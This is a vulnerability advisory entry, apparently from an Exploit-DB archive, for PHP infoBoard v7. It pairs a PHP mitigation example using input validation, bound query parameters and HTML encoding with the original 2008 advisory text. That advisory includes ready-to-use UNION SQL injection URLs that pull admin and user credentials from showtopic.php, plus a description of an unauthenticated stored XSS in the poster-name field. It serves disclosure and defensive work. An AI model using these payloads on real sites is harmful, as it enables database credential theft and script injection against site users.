Vendor: PHP infoBoard
By: CWH Underground
CVSS: 8.8 (HIGH)
Remote SQL Injection and Stored XSS
CWE: 89, 79
Product Name: PHP infoBoard
Affected Version From: v.7
Affected Version To: v.7
Patch Exists: NO
Related CWE: N/A
CPE: a:cannot.info:phpinfoboard:7
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

PHP infoBoard V.7 Plus Multiple Remote Vulnerabilities

PHP infoBoard V.7 Plus is vulnerable to Remote SQL Injection and Stored XSS. An attacker can inject malicious SQL code into the 'idcat' parameter of the 'showtopic.php' page to gain access to the database. Additionally, an attacker can inject malicious JavaScript code into the 'isname' parameter of the 'newtopic' page to perform a stored XSS attack.

Mitigation:

Validate and sanitize user input before it is used in SQL queries, and likewise before it is used in web page content.
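
One way to apply the mitigation above in PHP, as an added example that is not PHP infoBoard's own code: `idcat` is validated as an integer and bound as a query parameter, and `isname` is HTML-encoded on output. The `topic` table and its columns, the helper function names and the in-memory SQLite database are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical schema standing in for the board's topic table (not taken from the product).
function demo_db(): PDO {
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE topic (id INTEGER PRIMARY KEY, idcat INTEGER, isname TEXT, title TEXT)');
    return $pdo;
}

// idcat is a category number: accept a positive integer, reject anything else (arrays included).
function parse_idcat($raw): ?int {
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Bound parameters keep the value out of the SQL text even if validation is later relaxed.
function topics_in_category(PDO $pdo, int $idcat): array {
    $stmt = $pdo->prepare('SELECT isname, title FROM topic WHERE idcat = :idcat ORDER BY id');
    $stmt->bindValue(':idcat', $idcat, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Store the poster's name as typed; encoding is applied when it is written into HTML.
function add_topic(PDO $pdo, int $idcat, string $isname, string $title): void {
    $stmt = $pdo->prepare('INSERT INTO topic (idcat, isname, title) VALUES (?, ?, ?)');
    $stmt->execute([$idcat, $isname, $title]);
}

// Encode for the HTML context on every output, covering both quote styles for attributes.
function h(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

$pdo = demo_db();
add_topic($pdo, 1, '<script>alert(1)</script>', 'hello');   // constructed isname value

foreach (['1', "-1'/**/UNION"] as $raw) {                   // constructed idcat values
    $idcat = parse_idcat($raw);
    if ($idcat === null) {
        echo "idcat rejected: respond with 400 Bad Request\n";
        continue;
    }
    foreach (topics_in_category($pdo, $idcat) as $row) {
        echo '<td>' . h($row['isname']) . '</td><td>' . h($row['title']) . "</td>\n";
    }
}
```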

Exploit-DB raw data:

==========================================================
  PHP infoBoard V.7 Plus Multiple Remote Vulnerabilities
==========================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'

AUTHOR : CWH Underground
DATE   : 25 September 2008
SITE   : cwh.citec.us


#####################################################
APPLICATION : PHP infoBoard V.7 Plus
VERSION     : v.7
VENDOR      : http://cannot.info/phpinfoboard
DOWNLOAD    : http://cannot.info/lib/dw/plus7.zip
#####################################################

-- Remote SQL Injection ---

[+]http://[Target]/[path]/showtopic.php?idcat=-1'/**/UNION/**/SELECT/**/1,2,3,4,concat(info_name,0x3a,0x3a,0x3a,info_pass),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/**/FROM/**/[prefix]info_admin--&showpage=10
[+]http://[Target]/[path]/showtopic.php?idcat=-1'/**/UNION/**/SELECT/**/1,2,3,4,concat(info_name,0x3a,0x3a,0x3a,info_pass),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/**/FROM/**/[prefix]info_user--&showpage=10

Note: [prefix] is the table-name prefix that an administrator assigns when setting up PHP infoBoard.


-- Stored XSS --

At page http://[Target]/[path]/?action=newtopic&idcat=[number]

This page is used to add new topics, and it has a field "ชื่อ" which is provided for entering the poster's name.
We can inject JavaScript into this field, resulting in "Stored XSS".

Example code of vulnerable input field:
ชื่อ</td><td width='125' height='25' align='left'><input  name='isname' type='text'  size='25' value='' />

Note:
- [number] is an idcat that an administrator assigns (default is 1).
- We can inject JavaScript into the field without logging in as a PHP infoBoard user.


#####################################################################
Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos
Special Thx : asylu3, str0ke, citec.us, milw0rm.com
#####################################################################

# milw0rm.com [2008-09-25]